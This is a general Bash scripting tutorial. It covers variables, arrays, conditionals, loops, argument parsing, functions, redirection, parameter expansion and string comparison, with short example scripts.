Bash for Hackers, Developers and Skiddies

Shell?

At its base, a shell is simply a macro processor that executes commands. The term macro processor means functionality where text and symbols are expanded to create larger expressions.

A Unix shell is both a command interpreter and a programming language. As a command interpreter, the shell provides the user interface to the rich set of GNU utilities. The programming language features allow these utilities to be combined. Files containing commands can be created, and become commands themselves. These new commands have the same status as system commands in directories such as /bin, allowing users or groups to establish custom environments to automate their common tasks.

Shells may be used interactively or non-interactively. In interactive mode, they accept input typed from the keyboard. When executing non-interactively, shells execute commands read from a file.

A shell allows execution of GNU commands, both synchronously and asynchronously. The shell waits for synchronous commands to complete before accepting more input; asynchronous commands continue to execute in parallel with the shell while it reads and executes additional commands. The redirection constructs permit fine-grained control of the input and output of those commands. Moreover, the shell allows control over the contents of commands’ environments.

Shells also provide a small set of built-in commands (builtins) implementing functionality impossible or inconvenient to obtain via separate utilities. For example, cd, break, continue, and exec cannot be implemented outside of the shell because they directly manipulate the shell itself. The history, getopts, kill, or pwd builtins, among others, could be implemented in separate utilities, but they are more convenient to use as builtin commands. All of the shell builtins are described in subsequent sections.
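We can ask the shell itself how it would resolve a name. A quick sketch using the `type` builtin (assuming a standard Linux environment where ls is an external program):

```shell
# 'type -t' reports how the shell would interpret a name:
# builtin, file, alias, function, or keyword.
type -t cd      # builtin: cd manipulates the shell's own state
type -t ls      # file: an external program found on the PATH
type -t if      # keyword: part of the shell grammar
```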

While executing commands is essential, most of the power (and complexity) of shells is due to their embedded programming languages. Like any high-level language, the shell provides variables, flow control constructs, quoting, and functions.

Shells offer features geared specifically for interactive use rather than to augment the programming language. These interactive features include job control, command line editing, command history and aliases. Each of these features is described in this manual.


Shebang

You will always see #!/bin/bash or #!/usr/bin/env bash as the first line when writing or reading Bash scripts. A shebang starts with the #! characters followed by the path to bash or another interpreter of your choice. Let us see what the shebang is in Linux and Unix shell scripts.

The #! syntax is used in scripts to indicate an interpreter for execution under UNIX / Linux operating systems. The directive must be the first line of the script and must start with the shebang #!. You can optionally add an argument after the interpreter path. Make sure the interpreter is given as the full path to a binary file, for example /bin/bash.

The syntax is:

#!/path/to/interpreter [arguments]
#!/path/to/interpreter -arg1 -arg2

Most Linux shell, Perl, and Python scripts start with a line like this. Bash or sh example:

#!/bin/bash

Starting a Script With #!

  • It is called a shebang or a “bang” line.
  • It is nothing but the absolute path to the Bash interpreter.
  • It consists of a number sign and an exclamation point character (#!), followed by the full path to the interpreter such as /bin/bash.
  • All scripts under Linux execute using the interpreter specified on the first line.
  • Almost all Bash scripts begin with #!/bin/bash (assuming that Bash has been installed in /bin).
  • This ensures that Bash will be used to interpret the script, even if it is executed under another shell.
  • The shebang was introduced by Dennis Ritchie between Version 7 Unix and 8 at Bell Laboratories. It was then also added to the BSD line at Berkeley.
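The mechanics can be demonstrated end to end. A minimal sketch, assuming Bash lives at /bin/bash: we write a tiny script to a temporary file, mark it executable, and run it directly, so the kernel reads the shebang line and hands the file to /bin/bash.

```shell
# Write a throwaway script whose first line is a shebang.
script=$(mktemp)
cat > "$script" <<'EOF'
#!/bin/bash
echo "running under: $BASH"
EOF

chmod +x "$script"   # the execute bit is required to run it directly
out=$("$script")     # the kernel invokes /bin/bash for us
echo "$out"
rm -f "$script"
```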

Now let’s go back to the elementary. Variables in Bash are defined with an equals sign, with no space before or after it:

var='value'

The reason is simple: with spaces around the equals sign, Bash cannot distinguish a variable assignment from a program invocation with arguments. Does op = foo mean assigning ‘foo’ to a variable named op, or executing the program op with two arguments, ‘=’ and ‘foo’? To use a variable, put a dollar sign before its name:

name=foo
echo "Hello, $name"

We can also use braces to surround the variable. It’s equivalent to the form without braces, with one exception:

echo "Hello, ${name}"

# Without braces, the variable becomes $namefoo
echo "Hello, ${name}foo"

We can assign a variable to another:

name=foo
greeting="Hello, ${name}"

Alright, let’s talk arrays. Arrays are defined as a list of words between ( and ). We can also implicitly define an array by assigning values to its indices.

array[0]=foo
array[3]=bar
# Creates an array of two elements.

Curly braces are required to access an element in an array, e.g. ${array[0]}.

array=(1 3 10)
array[0]=foo
echo "${array[0]} ${array[1]}"
# Prints:
# foo 3

If the index to be accessed does not exist, Bash will return an empty string instead. The length of an array can be obtained through ${#array[@]}.

array=(3 10 2 6)
echo "${#array[@]}"
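A few more array operations worth knowing; a short sketch, assuming Bash 4.3 or later for the negative-index form:

```shell
array=(3 10 2 6)
array+=(42)               # += appends elements to the end

echo "${#array[@]}"       # 5: the array now has five elements
echo "${array[-1]}"       # 42: negative indices count from the end
echo "${array[@]:1:2}"    # 10 2: a slice of two elements starting at index 1
```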

There are cases when we want to access the array as a whole, e.g.,

  1. Accessing each element in a loop;
  2. Passing the array as an argument or a list of arguments to a program.

Bash provides two slightly different forms to refer to the whole array: ${array[@]} and ${array[*]}. Either of them can be used with or without double quotes. So there are in total four different forms to access the whole array. Their effects are different.

${array[@]} and ${array[*]} behave in the same way: the value of the array is first interpolated where it is used, and then word-splitting is applied. If an element contains spaces, it will be split into multiple arguments.

"${array[@]}" treats each element of the array as a separate argument. In contrast to the previous case, an argument containing spaces will still be regarded as one argument.

"${array[*]}" converts the whole array into a string. It’s like doing the join operation on the array that many scripting languages support.

# An array
array=('foo bar' baz)

# Creates "foo", "bar" and "baz"
touch ${array[@]}
touch ${array[*]}

# Creates "foo bar" and "baz"
touch "${array[@]}"

# Creates "foo bar baz"
touch "${array[*]}"
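The same four forms can be compared without creating files, using a small helper (the name count_args is hypothetical) that just reports how many arguments it received:

```shell
# Report the number of arguments passed to the function.
count_args() { echo $#; }

array=('foo bar' baz)

count_args ${array[@]}      # 3: 'foo bar' is word-split into two arguments
count_args "${array[@]}"    # 2: each element stays one argument
count_args "${array[*]}"    # 1: the whole array joined into a single word
```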

We already know Bash variables are untyped. It means arrays can be used like strings, and strings can also be used like arrays, but the result may not be what we desired.

If we have an array variable myarray, using it as a string such as $myarray returns the first element of the array, equivalent to ${myarray[0]}. It is almost always a mistake to use arrays in this way.

If we have a string variable mystr, using it as an array has the effect of operating on an array containing only one argument, the string itself. Thus, ${mystr[0]} returns the string itself and ${#mystr[@]} returns 1.

Truth values of exit codes

All processes terminate with an exit code. In Bash, the exit code of the last command is written to the special variable $?.

But very counter-intuitively, when dealing with exit codes, Bash treats 0 as true and all non-zero values as false. This makes sense in this particular scenario, since we can use different non-zero values to represent different failure reasons. But we must keep in mind that it’s contrary to how Bash treats integers as booleans in arithmetic contexts, i.e. between (( and )).
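A quick sketch of the convention, using the true and false builtins and a subshell to produce an arbitrary exit code:

```shell
true;  echo $?       # 0: success, which Bash treats as "true"
false; echo $?       # 1: failure, which Bash treats as "false"
(exit 42); echo $?   # 42: any non-zero code can encode a failure reason
```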

&&, || and !

In a programming language that supports primitive boolean values, && is usually the logical-AND operator and || logical-OR. Bash is slightly different, since it doesn’t have built-in boolean values. Instead of returning either 0 or 1, these operators return one of the exit codes of the two commands.

CMD1 && CMD2 first executes CMD1. If the exit code of CMD1 is non-zero (i.e. false), then it returns that value immediately without executing CMD2. Otherwise, it executes CMD2 and returns its exit code.

e.g. Execute apt update if apt is installed (command -v PROG tests whether PROG can be found on the PATH).

command -v apt > /dev/null && apt update

CMD1 || CMD2 first executes CMD1. If the exit code of CMD1 is zero (i.e. true), then it returns 0 immediately without executing CMD2. Otherwise, it executes CMD2 and returns its exit code.

e.g. Create ~/.cache if the directory does not exist (the [[ command will be explained later). Note that the tilde must be left unquoted, or it will not expand to your home directory:

[[ -d ~/.cache ]] || mkdir ~/.cache

In practice, we usually use CMD1 && CMD2 to represent executing CMD2 only if CMD1 succeeds, and CMD1 || CMD2 executing CMD2 only if CMD1 fails.

! CMD (note the space after !) flips a zero exit code to 1 and all non-zero exit codes to 0.
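For example, negating the exit codes of the true and false builtins:

```shell
! false; echo $?   # 0: the failure was inverted into success
! true;  echo $?   # 1: the success was inverted into failure

# Typical use: act only when a test fails.
if ! [[ -d /no/such/dir ]]; then
  echo "directory is missing"
fi
```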

The if statement

The form of if statements is:

if TEST ; then
  COMMANDS
elif TEST ; then
  COMMANDS
else
  COMMANDS
fi

The elif and else clauses are optional.

We can use any commands in the place of TEST. But we need to remember that Bash treats zero exit code as true and all non-zero exit codes as false.

We are also allowed to use arithmetic expressions here, such as (( val > 3 )), but we need to keep in mind that if the value of the parenthesized expression is non-zero, the exit code of the command will be 0 (both representing true in their own contexts), and vice versa.
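Putting that together, a small sketch of an arithmetic test in an if statement:

```shell
val=5
if (( val > 3 )); then
  msg="big"     # (( )) exits 0 when the expression evaluates to non-zero
else
  msg="small"
fi
echo "$msg"     # big
```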

The [[ command

A very useful command that can be used as a test condition is [[, the extended test command.

Here are some judgements that [[ supports:

# string equal
[[ "$str1" = "$str2" ]]

# string not equal
[[ "$str1" != "$str2" ]]

# string less-than alphabetically
[[ "$str1" < "$str2" ]]

# string greater-than alphabetically
[[ "$str1" > "$str2" ]]

# integer equal
[[ "$num1" -eq "$num2" ]]

# integer not equal
[[ "$num1" -ne "$num2" ]]

# integer less-than
[[ "$num1" -lt "$num2" ]]

# integer less-than-or-equal-to
[[ "$num1" -le "$num2" ]]

# integer greater-than
[[ "$num1" -gt "$num2" ]]

# integer greater-than-or-equal-to
[[ "$num1" -ge "$num2" ]]

# string is empty
[[ -z "$str" ]]

# string not empty
[[ -n "$str" ]]

# regular file exists
[[ -f "$filepath" ]]

# directory exists
[[ -d "$dirpath" ]]

# file exists and readable
[[ -r "$filepath" ]]

# file exists and writable
[[ -w "$filepath" ]]

# file exists and executable
[[ -x "$filepath" ]]

# compound tests
[[ "$str1" > "$str2" && -z "$filepath" ]]
[[ "$str1" > "$str2" || -z "$filepath" ]]
[[ ! "$str1" > "$str2" ]]
[[ ("$str1" > "$str2" || -z "$filepath") && (-d "$dirpath") ]]

The complete list of supported tests can be found in the Bash manual.

Strangely, [[ only supports string less-than and greater-than, not less-than-or-equal or greater-than-or-equal.

Here is an example that first tests if ~/.bashrc exists, and if so, executes the commands in the file. The tilde is left unquoted so that it expands to the home directory:

if [[ -f ~/.bashrc ]] ; then
  source ~/.bashrc
fi

# A more concise form as a one-line command
[[ -f ~/.bashrc ]] && source ~/.bashrc

The case statement

The syntax of case is:

case "$value" in
  PATTERN)
    COMMANDS
    ;;
  PATTERN1 | PATTERN2)  # Matches either pattern
    COMMANDS
    ;;
esac

A pattern is a string that contains some special characters, for example:

  • * matches any string.
  • ? matches any single character.
  • [...] matches any single character between the brackets.

e.g. Match any string that starts with --mypath= with the pattern --mypath=*.

A full description can be found in the Bash manual.
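Here is a sketch of the --mypath=* pattern in action; stripping the prefix with the ${arg#pattern} expansion (covered later) recovers the value:

```shell
arg='--mypath=/tmp/data'

case "$arg" in
  --mypath=*)
    path=${arg#--mypath=}   # remove the matched prefix, keeping the value
    echo "path is $path"
    ;;
  *)
    echo "unrecognized option: $arg"
    ;;
esac
```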

Loops

The for loop takes a list of arguments and executes the loop body by assigning each of the arguments to the loop variable. The interpretation of the arguments follows the general rule of parsing command arguments, first interpolating variables and then splitting words.

The syntax of the for loop is:

for var in ARG1 ARG2 .. ; do
  COMMANDS
done

For example, if we want to iterate a list of words:

words='apple banana strawberry'
for fruit in $words ; do
  echo $fruit
done

We can also iterate a range of integers using the range construct:

# Prints 0 1 .. 9
for i in {0..9} ; do
  echo $i
done

The range construct doesn’t support using variables in it; it means something such as {0..${end}} doesn’t work. We can use the C-like for loop to do this job:

end=10
# Prints 0 1 .. 9
for ((i = 0; i < end; i++)) ; do
  echo $i
done

The dollar sign is optional for variables occurring between (( and )).
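As a small sketch of the C-like loop, summing the integers 0 through 9:

```shell
sum=0
for ((i = 0; i < 10; i++)); do
  ((sum += i))    # the dollar sign is optional inside (( ))
done
echo "$sum"       # 45
```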

The while loop takes a testing command, executing the loop body as long as the test command exits with zero.

while TEST ; do
  COMMANDS
done

We can also use arithmetic expressions as test commands, but we need to notice what it means for the expression to exit with zero.

i=0
while ((i < 10)) ; do
  echo $i
  ((i = i + 1))
done

Command line arguments

The first argument passed to a bash script is in the variable $1, the second in $2, and so on.

The entire list of arguments can be accessed via $@ and $*. To recap what we have learned in the section of arrays:

  1. $@ and $* respects the general rule of argument parsing, first string interpolation and then word-splitting.
  2. "$@" treats each element as an individual argument, equivalent to "$1" "$2" ..
  3. "$*" treats the whole array as an argument, equivalent to "$1 $2 .."

We can use $# to get the length of the argument list.

The shift [N] command is useful in parsing command line arguments. It removes the first N arguments from the list and moves all other arguments ahead. In the example below, we use a while loop to iterate the arguments and use a case statement to do pattern matching on each argument.

USAGE='foo --help --verbose --file [file]'

while (("$#")) ; do
  case $1 in
    --help|-h)
      echo "$USAGE"
      exit 1
      ;;
    --verbose|-v)
      verbose=1
      shift   # N is 1 when omitted
      ;;
    --file|-f)
      file=$2
      shift 2
      ;;
    *)
      echo "Unrecognized option: $1"
      exit 1
      ;;
  esac
done

The built-in command to read from the user is read.

read varname

Read a line from standard input and store it in variable varname. The newline character is not saved in varname.

read -p "Enter your name: " username

Display the prompt and then read a line from standard input.

read -s password

Read a line without echoing. It can be used to read passwords from the user.

read name gender

If the input is Thomas Male, then after reading the input, name will be Thomas and gender will be Male.

The rule is that the input string is split into words on IFS characters (space, tab, and newline by default), each word is assigned to each variable in order, and the rest is assigned to the last variable.

Backslashes can be used to escape IFS characters, e.g., foo\ bar is considered as a word.
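IFS can be overridden just for the read command to split on a custom separator. A sketch using an /etc/passwd-style record as made-up input:

```shell
# Setting IFS in the same command affects only this read.
# <<< feeds the string to read's standard input (a "here string").
IFS=: read -r user pass uid gid <<< 'alice:x:1000:1000'

echo "$user has uid $uid"   # alice has uid 1000
```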

read -a arrayname

Read a line and store it as an array. If the input is foo bar, then the array will contain two elements, one foo and the other bar.

while read line ; do
  echo "$line"
done

Read line by line from standard input until reaching end of file or the user presses Ctrl-D.

cat orders.txt | while read customer product ; do
  echo "$customer purchased $product"
done

Process orders.txt line by line. Standard input can be redirected to the output of another command via a pipe.
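The same loop can read the file directly with a redirection, avoiding the extra cat process. A self-contained sketch (the two order lines are made-up sample data):

```shell
# Create a throwaway file standing in for orders.txt.
tmp=$(mktemp)
printf '%s\n' 'alice laptop' 'bob phone' > "$tmp"

count=0
while read -r customer product; do   # -r keeps backslashes literal
  echo "$customer purchased $product"
  count=$((count + 1))
done < "$tmp"                        # redirect the file into the loop

rm -f "$tmp"
echo "$count lines processed"        # 2 lines processed
```

One advantage of the redirection form: the loop runs in the current shell rather than in a pipeline subshell, so variables like count set inside the loop survive after it.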

Functions

#!/bin/bash

function quit {
   exit
}
function hello {
   echo Hello!
}
hello
quit
echo foo

Functions with parameters sample

#!/bin/bash

function quit {
   exit
}
function e {
    echo $1
}
e Hello
e World
quit
echo foo

Functions are like embedded scripts in Bash scripts, but not exactly: functions run in the same process as the script, whereas subprocesses run in a separate process.

The example below defines a function called compress that runs the tar command to compress files and directories.

compress () {
  local target=$1
  local source=$2
  tar -cjvf "${target}.tar.bz2" "${source}"
}

Local variables in a function should be declared with the local keyword. If the variable is not declared with local, it will be treated as a global variable. Assigning to a variable not declared with local might overwrite the value of a global variable with the same name.
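The scoping rules can be seen directly. A sketch with a hypothetical function named demo:

```shell
x=outer
y=original

demo() {
  local x=inner   # 'local' shadows the global x only inside demo
  y=changed       # no 'local': this assignment writes the global y
  echo "$x"
}

demo              # prints: inner
echo "$x"         # prints: outer (the global x is untouched)
echo "$y"         # prints: changed
```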

The function body can access function arguments in the same way that the script accesses command-line arguments, e.g., via $1, $2 and $@.

A function is also invoked in the same manner as a command. For example, to compress directory foo into foobar.tar.bz2:

compress foobar foo

Standard input and output of a function can be redirected as well. The following example redirects the output of the function to a file.

get_password () {
  local result
  read -s -p "Password: " result
  echo "$result"
}

get_password > password.txt

Functions can return an exit code with return. The return value can be used in an if statement, for example:

trivial () {
  return 0
}

if trivial ; then
  echo "It's trivially true"
fi

Subprocesses

Instead of running commands in the current process, we can run some commands in a separate subprocess. The way we run commands in a separate process is to surround the commands between ( and ), for example:

# The cd command doesn't change the working directory of the parent process.
(cd foo ; make)

There are several reasons why we might want to run commands in a subprocess:

  1. What happens in the subprocess won’t affect the parent process. In the example above, the change of the working directory only has an influence on the command in the subprocess itself, i.e., the make command.
  2. If the subprocess exits prematurely, it won’t terminate the parent process.
  3. We can capture the output of the subprocess into a variable. See the example below that captures the output of ls -al and saves it into variable res:
res=$(ls -al)

Environment Variables

Not all Bash variables are environment variables.

If we only define a Bash variable MY_ENV=3 without exporting it, it won’t be passed down to subprocesses.

To make a Bash variable an environment variable, we need to export it at least once.

Although it’s common to assign an environment variable while exporting it, doing so is not necessary.

# Approach 1
export MY_ENV=3

# Equivalent Approach 2
MY_ENV=3
export MY_ENV

If we want to specify an environment variable for only one command, we can embed the assignment of the environment variable in that command. For example:

NODE_ENV=test node app.js
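The assignment prefix affects only that one command; the parent shell's environment is untouched. A sketch demonstrating this with a child bash instead of node (MY_ENV_DEMO is a made-up variable name assumed not to be set already):

```shell
# The child process sees the variable...
child=$(MY_ENV_DEMO=test bash -c 'echo "$MY_ENV_DEMO"')
echo "child sees: $child"                  # child sees: test

# ...but the parent shell never had it set.
echo "parent sees: ${MY_ENV_DEMO:-unset}"  # parent sees: unset
```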

Redirections

There are three standard files opened at the start of every command: standard input, standard output and standard error, corresponding to file descriptors 0, 1, and 2.

By default, standard input is the keyboard, and standard output/error is the screen. But we can redirect them to disk files, named pipes, and even other processes via pipes.

Redirect standard input

mycmd < input.txt

Redirect standard input to input.txt.

Redirect standard output

mycmd > output.log

Redirect standard output to output.log. If the file exists, clear the content of the file first.

Appending to a file

mycmd >> output.log

Redirect standard output to output.log, appending to the file.

Redirect standard error

mycmd 2> error.log

Redirect standard error to error.log.

Redirect standard error to standard output

mycmd 2>&1

Redirect standard error to standard output.
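In practice, 2>&1 is most often combined with > to send both streams to the same file. Order matters: stdout must be redirected to the file first, then stderr pointed at stdout; writing 2>&1 > file would leave stderr on the terminal. A sketch:

```shell
log=$(mktemp)

# The brace group emits one line on each stream; both land in $log.
{ echo "to stdout"; echo "to stderr" >&2; } > "$log" 2>&1

content=$(cat "$log")
echo "$content"
rm -f "$log"
```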

Shell-Parameter-Expansion

The ‘$’ character introduces parameter expansion, command substitution, or arithmetic expansion. The parameter name or symbol to be expanded may be enclosed in braces, which are optional but serve to protect the variable to be expanded from characters immediately following it which could be interpreted as part of the name.

The length in characters of the expanded value of parameter is substituted. If parameter is * or @, the value substituted is the number of positional parameters. If parameter is an array name subscripted by * or @, the value substituted is the number of elements in the array. If parameter is an indexed array name subscripted by a negative number, that number is interpreted as relative to one greater than the maximum index of parameter, so negative indices count back from the end of the array, and an index of -1 references the last element.

var="I'm foo"
echo "${#var}"   # 7

If the first character of parameter is an exclamation point (!), and parameter is not a nameref, it introduces a level of indirection. Bash uses the value formed by expanding the rest of parameter as the new parameter; this is then expanded and that value is used in the rest of the expansion, rather than the expansion of the original parameter. This is known as indirect expansion. The value is subject to tilde expansion, parameter expansion, command substitution, and arithmetic expansion. If parameter is a nameref, this expands to the name of the variable referenced by parameter instead of performing the complete indirect expansion. The exceptions to this are the expansions of ${!prefix*} and ${!name[@]} described below. The exclamation point must immediately follow the left brace in order to introduce indirection.

In each of the cases below, word is subject to tilde expansion, parameter expansion, command substitution, and arithmetic expansion.

When not performing substring expansion, using the form described below (e.g., ‘:-’), Bash tests for a parameter that is unset or null. Omitting the colon results in a test only for a parameter that is unset. Put another way, if the colon is included, the operator tests for both parameter’s existence and that its value is not null; if the colon is omitted, the operator tests only for existence.

Alright, but what is the difference between ${var}, “$var”, and “${var}” in the Bash shell?

${var:-default}  # Use default if var is unset or empty
${var:=default}  # Set var to default if var is unset or empty
${var:+value}    # Use value if var is set, otherwise use nothing
${var#pattern}   # Remove shortest match of pattern from the beginning
${var##pattern}  # Remove longest match of pattern from the beginning
${var%pattern}   # Remove shortest match of pattern from the end
${var%%pattern}  # Remove longest match of pattern from the end
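The pattern-removal operators are especially handy for splitting paths and file names. A sketch on a made-up path (these are pure string operations; the file does not need to exist):

```shell
path='/home/user/archive.tar.gz'

echo "${path##*/}"    # archive.tar.gz  (strip the longest */ prefix)
echo "${path%/*}"     # /home/user      (strip the shortest /* suffix)

file=${path##*/}
echo "${file%%.*}"    # archive         (strip the longest .* suffix)
echo "${file#*.}"     # tar.gz          (strip the shortest *. prefix)
```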

In most cases, $var and ${var} are the same:

var="Hello"
echo $var

The braces are only needed to resolve ambiguity in expressions:

var="Hello World"
echo "${var}"

When you add double quotes around a variable, you tell the shell to treat it as a single word, even if it contains whitespace. As with $var vs. ${var}, the braces are only needed to resolve ambiguity, for example:

var="foo bar"
for i in "$varbar"; do # Expands to 'for i in ""; do...' since there is no
    echo $i            #   variable named 'varbar', so loop runs once and
done                   #   prints nothing (actually "")

var="foo bar"
for i in "${var}bar"; do # Expands to 'for i in "foo barbar"; do...'
    echo $i              #   so runs the loop once
done
# foo barbar

Note that "${var}bar" in the second example above could also be written "${var}"bar, in which case you don’t need the braces anymore, i.e. "$var"bar. However, if you have a lot of quotes in your string these alternative forms can get hard to read (and therefore hard to maintain).

Referencing an array variable without a subscript is equivalent to referencing the array with a subscript of 0, meaning that if you don’t supply an index with [], you get the first element of the array:

foo=(a b c)
echo $foo
# a

Which is exactly the same as

foo=(a b c)
echo ${foo}
# a

To get all the elements of an array, you need to use @ as the index, e.g. ${foo[@]}. The braces are required with arrays because without them, the shell would expand the $foo part first, giving the first element of the array followed by a literal [@]:

foo=(a b c)
echo ${foo[@]}
# a b c
echo $foo[@]
# a[@]

You didn’t ask about this but it’s a subtle difference that’s good to know about. If the elements in your array could contain whitespace, you need to use double quotes so that each element is treated as a separate “word:”

foo=("the first" "the second")
for i in "${foo[@]}"; do # Expands to 'for i in "the first" "the second"; do...'
    echo $i              #   so the loop runs twice
done
# the first
# the second

Contrast this with the behavior without double quotes:

foo=("the first" "the second")
for i in ${foo[@]}; do # Expands to 'for i in the first the second; do...'
    echo $i            #   so the loop runs four times!
done
# the
# first
# the
# second

Alright, let’s take a look at some examples. How do you check if a string contains a substring? I looked this up on Stack Overflow, and there’s an answer: you can do

string='My long string'
if [[ $string == *"My long"* ]]; then
  echo "It's there!"
fi

Note that spaces in the needle string need to be placed between double quotes, and the * wildcards should be outside. Also note that a simple comparison operator is used (i.e. ==), not the regex operator =~.

If you prefer the regex approach:

string='My string';

if [[ $string =~ "My" ]]; then
   echo "It's there!"
fi

I am not sure about using an if statement, but you can get a similar effect with a case statement:

case "$string" in
  *foo*)
    # Do stuff
    ;;
esac

How to portably use “${@:2}”?

Neither ${@:2} nor ${*:2} is portable, and many shells will reject both as invalid syntax. If you want to process all arguments except the first, you should get rid of the first with a shift.

In the second approach below, after the shift the first argument is saved in “$first” and the remaining positional parameters have moved down one.

#!/bin/bash

if [[ $# -eq 1 ]]; then
        echo "$1"
else
        echo "$1 $(printf '%q' "${@:2}")"
fi

echo "another way..."

first="${1}"
shift
echo The arguments after the first are:
for x; do echo "$x"; done

Shell Parameter Expansion (Default value)

if [ -z "${VARIABLE}" ]; then
    FOO='default'
else
    FOO=${VARIABLE}
fi

To get the assigned value, or default if it’s missing:

FOO="${VARIABLE:-default}"  # If variable not set or null, use default.
# If VARIABLE was unset or null, it still is after this (no assignment done).

Or to assign default to VARIABLE at the same time:

FOO="${VARIABLE:=default}"  # If variable not set or null, set it to default.

Compare #!/bin/bash --login with #!/bin/bash

The main difference is that a login shell executes your profile when it starts. From the man page:

When bash is invoked as an interactive login shell, or as a non-interactive shell with the --login option, it first reads and executes commands from the file /etc/profile, if that file exists. After reading that file, it looks for ~/.bash_profile, ~/.bash_login, and ~/.profile, in that order, and reads and executes commands from the first one that exists and is readable. The --noprofile option may be used when the shell is started to inhibit this behavior.

When a login shell exits, bash reads and executes commands from the file ~/.bash_logout, if it exists.

Concatenate Strings

The simplest way to concatenate two or more string variables is to write them one after another:

VAR1="Hello,"
VAR2=" World"
VAR3="$VAR1$VAR2"
echo "$VAR3"

You can also concatenate one or more variables with literal strings. In the example below, variable VAR1 is enclosed in curly braces to protect the variable name from the surrounding characters: when a variable is followed by another valid variable-name character, you must enclose it in curly braces, ${VAR1}.

VAR1="Hello, "
VAR2="${VAR1}World"
echo "$VAR2"

Another way of concatenating strings in bash is by appending variables or literal strings to a variable using the += operator:

VAR1="Hello,"
VAR1+=" World"
echo "$VAR1"

The following example uses the += operator to concatenate strings in a Bash for loop:

VAR=""
for ELEMENT in 'Hydrogen' 'Helium' 'Lithium' 'Beryllium'; do
  VAR+="${ELEMENT} "
done

echo "$VAR"

Compare

Compare Strings

  • string1 = string2 and string1 == string2 - The equality operator returns true if the operands are equal.
    • Use the = operator with the test [ command.
    • Use the == operator with the [[ command for pattern matching.
  • string1 != string2 - The inequality operator returns true if the operands are not equal.
  • string1 =~ regex - The regex operator returns true if the left operand matches the extended regular expression on the right.
  • string1 > string2 - The greater than operator returns true if the left operand is greater than the right sorted by lexicographical (alphabetical) order.
  • string1 < string2 - The less than operator returns true if the left operand is less than the right sorted by lexicographical (alphabetical) order.
  • -z string - True if the string length is zero.
  • -n string - True if the string length is non-zero.
  • -e <file_a>: file_a exists.
  • -f <file_a>: file_a exists and is a regular file.
  • -d <file_a>: file_a exists and is a directory.
  • -r <file_a>: file_a exists with read permissions.
  • -w <file_a>: file_a exists with write permissions.
  • -x <file_a>: file_a exists with execute permissions.
  • -s <file_a>: file_a exists and its size is greater than zero.
  • -O <file_a>: file_a exists and is owned by the effective user ID.
  • -G <file_a>: file_a exists and is owned by the effective group ID.
  • -h <file_a>: file_a exists and is a symbolic link.
  • -L <file_a>: file_a exists and is a symbolic link (same as -h).
  • -b <file_a>: file_a exists and is a block-special file.
  • -c <file_a>: file_a exists and is a character-special file.
  • -S <file_a>: file_a exists and is a socket.

For Example :

#!/bin/bash

# Check if the first argument is "hello"
if [[ $1 == "hello" ]]; then
    echo "First argument is 'hello'"
fi

# Check if the variable "name" is not empty
if [[ -n $name ]]; then
    echo "Variable 'name' is not empty"
fi

# Check if the second argument is empty
if [[ -z "$2" ]]; then
    echo "Second argument is empty"
fi

# OR check if the variable "file" is either "file1.txt" or "file2.txt"
if [ "$file" = "file1.txt" ] || [ "$file" = "file2.txt" ]; then
    echo "Variable 'file' is either 'file1.txt' or 'file2.txt'"
fi

# Compact string comparison
[[ "$input" == "yes" ]] && echo "Input is 'yes'" || echo "Input is not 'yes'"

How about checking if a string contains a substring? There are multiple ways to do it. One approach is to surround the substring with asterisk symbols *, which match any sequence of characters.

#!/bin/bash

VAR='GNU/Linux is an operating system'
if [[ $VAR == *"Linux"* ]]; then
  echo "It's there."
fi

Another option is to use the regex operator =~ as shown below. The period followed by an asterisk, .*, matches zero or more occurrences of any character except a newline.

#!/bin/bash

VAR='GNU/Linux is an operating system'
if [[ $VAR =~ .*Linux.* ]]; then
  echo "It's there."
fi

Comparing strings with the case statement: instead of the test operators, you can also use the case statement to compare strings:

#!/bin/bash

VAR="Arch Linux"

case $VAR in

  "Arch Linux")
    echo -n "Linuxize matched"
    ;;

  Fedora | CentOS)
    echo -n "Red Hat"
    ;;
esac

Lexicographical comparison is an operation where two strings are compared alphabetically by comparing the characters in a string sequentially from left to right. This kind of comparison is rarely used. The following scripts compare two strings lexicographically:

#!/bin/bash

VAR1="Linuxize"
VAR2="Ubuntu"

if [[ "$VAR1" > "$VAR2" ]]; then
    echo "${VAR1} is lexicographically greater than ${VAR2}."
elif [[ "$VAR1" < "$VAR2" ]]; then
    echo "${VAR2} is lexicographically greater than ${VAR1}."
else
    echo "Strings are equal"
fi

Compare Numbers

if [[ $# -eq 0 ]]; then
  # digital compare
  # -eq / -lt / -le / -gt / -ge / -ne
fi

./run.sh
if [[ $? -ne 0 ]];then
  echo "run.sh failed"
  exit 1
fi

Colors

We will cover this in more depth later, in the offensive section, with examples!

#!/bin/bash

# Function to print colored text
PrintColor() {
    echo -e "\e[1;31m$@\e[0m"
}

# Define common variables
ColorRedBeg="\e[1;31m"
ColorGreenBeg="\e[1;32m"
ColorYellowBeg="\e[1;33m"
ColorBlueBeg="\e[1;34m"
ColorMagentaBeg="\e[1;35m"
ColorCyanBeg="\e[1;36m"
ColorWhiteBeg="\e[1;37m"
ColorEnd="\e[m"

# Function to display usage information
Usage() {
    printf "$ColorBlueBeg%-16s\n$ColorEnd" "Usage: $0 [option] [value]"
    printf "%-16s\n" "Options:"
    printf "$ColorGreenBeg%-32s %-64s\n$ColorEnd" "-h" "Display help"
}

# Function to print styled text
print_style() {
    case "$2" in
        "info") COLOR="96m" ;;
        "success") COLOR="92m" ;;
        "warning") COLOR="93m" ;;
        "danger") COLOR="91m" ;;
        *) COLOR="0m" ;; # default color
    esac

    STARTCOLOR="\e[$COLOR"
    ENDCOLOR="\e[0m"

    printf "$STARTCOLOR%b$ENDCOLOR" "$1"
}

# Example usage of print_style function
print_style "This is a green text " "success"
print_style "This is a yellow text " "warning"
print_style "This is a light blue with a \t tab " "info"
print_style "This is a red text with a \n new line " "danger"
print_style "This has no color"

Others

num=4; if test "$num" -gt 5; then echo "yes"; else echo "no"; fi

file="/etc/passwd"; if [ -e "$file" ]; then echo "whew"; else echo "uh-oh"; fi

if [[ -f "proc.pid" ]]; then
  pid=`cat proc.pid`
fi

ForceStopAll

ps aux | grep `pwd` | grep -v grep | awk '{print $2}' | xargs kill -9
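
The grep/awk/xargs chain works, but it also matches any process whose command line merely mentions the current directory, and the kill -9 is unconditional. If procps is available, pgrep/pkill -f do the same full-command-line matching without the grep -v grep dance; doing a dry run first is a safer sketch:

```shell
# Dry run: list PIDs whose full command line contains the current directory.
pgrep -f "$(pwd)"

# After reviewing the list, actually kill them (same effect as the pipeline):
# pkill -9 -f "$(pwd)"
```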

CurrentPath

#!/bin/bash

echo $0                            # Script name
echo $(dirname $0)                 # Get the relative path of the current script
